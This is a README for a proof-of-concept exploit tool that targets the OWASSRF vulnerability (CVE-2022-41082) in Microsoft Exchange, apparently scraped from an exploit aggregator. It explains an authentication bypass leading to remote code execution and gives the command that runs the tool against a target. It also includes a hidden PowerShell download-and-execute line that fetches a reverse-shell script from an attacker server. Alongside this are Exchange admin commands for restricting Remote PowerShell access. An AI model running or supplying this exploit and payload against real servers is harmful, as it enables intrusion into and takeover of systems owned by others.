## https://sploitus.com/exploit?id=BF63DB79-1626-5C84-8886-54147C0FF64D
# CVE-2022-41082
This repository contains a proof-of-concept (PoC) tool for exploiting the **OWASSRF** vulnerability (CVE-2022-41082) in Microsoft Exchange servers. The exploit allows attackers to execute arbitrary commands on the server, potentially compromising the system.
## Overview
The tool leverages an **OWASSRF** vulnerability to bypass authentication and gain remote code execution (RCE) on an Exchange server. By exploiting this vulnerability, an attacker can execute commands as if they were an authenticated user, leading to severe security implications.
### How It Works
1. **Authentication Bypass**: The tool connects to the target Exchange server, bypassing authentication mechanisms using crafted requests.
2. **Remote Code Execution**: After successfully logging in, the tool opens a session that allows command execution on the Exchange server.
3. **Executing Commands**: Users can specify commands to be executed on the server, allowing for various actions, including file manipulation, network operations, or establishing reverse shells.
### Important Note
When using this tool, **please** ensure that you keep the same session of the Exchange Management Shell open. It is crucial to enable Remote PowerShell access for at least one user after disabling it for others. Otherwise, you may lose Management Shell access on all Exchange servers.
## Commands for Managing PowerShell Access
Here are some useful PowerShell commands to check and manage who has access:
### Check PowerShell Access
To see which users have Remote PowerShell access and which do not, run:
```powershell
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $false'
```
### Disable PowerShell Access for All Users
**Warning:** Be careful not to close the Exchange Management Shell window unless you add at least one user back.
You can disable PowerShell access for all users using the following commands:
```powershell
$user = Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
$user | foreach {Set-User -Identity $_ -RemotePowerShellEnabled $false}
```
Or use a single command to achieve the same result:
```powershell
Get-User -ResultSize Unlimited | Set-User -RemotePowerShellEnabled $false
```
### Re-enabling Access for a Specific User
To grant Remote PowerShell access to a specific user, run:
```powershell
Set-User "guest" -RemotePowerShellEnabled $true
```
### Workaround for Losing PowerShell Access
If you lose PowerShell access for all users, you can create a new mailbox user with administrator rights. This new user will bypass the policies applied, allowing you to use the Exchange Management Shell again.
## Using the PoC Tool
### Requirements
- Python 3.x
- Required libraries (install via `pip` if necessary)
### Running the Tool
To execute the PoC tool, run the following command:
```bash
python3 poc.py -H <target_IP> -u <username> -p <password> -c <command_file>
```
Replace `<target_IP>`, `<username>`, `<password>`, and `<command_file>` with your specific values.
### Example Command for Reverse Shell
You can modify the command in your `cmd_file` to include a reverse shell payload. For example:
```powershell
powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('http://your-malicious-server.com/reverse.ps1')"
```
This command will download and execute a PowerShell script from your server, giving you a reverse shell.
## References
For more information about the OWASSRF vulnerability and the PoC code, visit the following link: [OWASSRF CVE-2022-41082 PoC](https://github.com/balki97/OWASSRF-CVE-2022-41082-POC) and https://www.youtube.com/watch?v=c2DZYP6jc7g